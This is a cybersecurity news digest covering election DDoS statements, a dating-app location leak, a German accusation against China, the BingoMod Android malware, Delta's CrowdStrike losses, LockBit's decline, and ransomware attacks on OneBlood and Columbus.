In today’s cybersecurity news…
DDoS attacks won’t impact US elections
CISA and the FBI issued a joint statement to this effect, saying that DDoS activity could at best make accessing election information more difficult. The statement said neither agency found any evidence of DDoS attacks impacting election results or preventing casting ballots. They warned that any statements claiming DDoS attacks compromised the election likely will come from outside actors looking to undermine election confidence. The statement also recommended obtaining registration, polling, mail-in voting, and other information from official sources to avoid any misinformation.
Dating apps leaked precise location data
A new paper from researchers at the Belgian university KU Leuven found that the dating apps Badoo, Bumble, Grindr, happn, Hinge, and Hily all contained the same design flaw to let someone pinpoint another user’s location within 2 meters. Because these apps allowed for using exact locations as a filter option, the researchers used a technique called “oracle trilateration” to get their position. The researchers said getting a rough location based on profile information was enough to use the filters to determine when a person was no longer in range. Doing this at three different locations would allow for determining an exact location. The researchers reached out to the app makers, who changed the filter behavior to make the approach much less effective, introducing uncertainty ranges from 111 meters to 1 kilometer.
Germany formally blames China for 2021 cyberattack
The German government summoned the Chinese ambassador to lodge a complaint, formally accusing “Chinese state actors” of operating a cyberattack on its federal cartography agency. This marks the first time since 1989 that the German Foreign Ministry summoned a Chinese ambassador for a protest. That last one was for Tiananmen Square, so it’s a big deal. According to the Foreign Ministry, its intelligence services provided reliable information showing Chinese involvement. This follows something of a crackdown on Chinese influence in the country. In the last few months, Germany announced plans to reduce the usage of Huawei and ZTE network equipment in its 5G network and arrested three people on suspicion of spying to export military technology.
(Reuters)
BingoMod drains then wipes
Researchers at Cleafy documented a new actively developed Android malware called BingoMod. This poses as a various mobile security tools, with installs initially pushed through smishing campaigns. In the installation process, it asks for Accessibility feature access. From there, it steals credentials, takes screenshots, and reroutes SMS messages. The operators perform on-device fraud with a VNC routine that “abuses Android’s Media Projection API to obtain real-time screen content” which is then sent to its command servers. The researchers found instances of the operators stealing up to 15,000 euros per transaction. Once funds are stolen, BIngoMod can also wipe devices to make forensics even more difficult. The
Huge thanks to our sponsor, Dropzone AI
Delta dishes on CrowdStrike damages
Just yesterday we mentioned that Delta Air Lines began lawyering up for legal action against CrowdStrike. In an update, Delta CEO Ed Bastian laid out the stakes on CNBC for any potential legal action, saying it cost the company $500 million in damages. This accounts for the lost revenue from the outage as well as compensation and hotels for stranded passengers. Delta canceled over 5,000 flights over a five-day period due to the outage, more than all cancelations in 2019. The outage also sparked an investigation by the US Department of Transportation. Bastian said the company has “no choice” but to seek damages from CrowdStrike.
(CNBC)
A look at LockBit today
The Register’s Connor Jones published a look at the current state of Lockbit. The ransomware gang saw significant disruption due to the UK NCA’s Operation Cronos effort in February. From its peak in November 2023 when it claimed attacks on 108 different organizations, the group listed less than 18 as of this June according to data from Cyfirma. It’s affiliates also fell from 194 at the time of its bust to 69 according to NCA investigators. They found that these remaining affiliates represented “lower-level threat actors” attracted to the once potent LockBit brand. Investigators also found mention of LockBit on hacking forums sharply falling off. With the naming of the suspected LockBit leader as Russian national Dmitry Khoroshev, it’s unclear if its current operators will attempt a rebrand like we’ve seen from other defunct ransomware groups.
Ransomware hits blood donation center
The non-profit blood donation center OneBlood said a recent ransomware attack reduced its ability to operate blood collection and distribution services to hospitals across the Southeastern US. It asked over 250 hospitals to “activate their critical blood shortage protocols” as a result. It said it also cannot process therapeutic donations. Local hospitals need O Positive, O Negative, and platelet donations to make up for the disruption. No word on who orchestrated the attack, but OneBlood began working with local investigators to restore services.
Following up on Columbus ransomware outage
Last month we covered a ransomware attack against the Ohio capital, which disrupted many city services and municipal email. In an update, city investigators said an unnamed “established, sophisticated threat actor operating overseas” orchestrated the attack to disrupt its IT infrastructure and deploy ransomware. The city also began notifying people with data potentially exposed in the attack, although it did not outright confirm data exfiltration. The attackers gained access to municipal systems after an employee downloaded a malicious file, although said this wasn’t through a phishing email.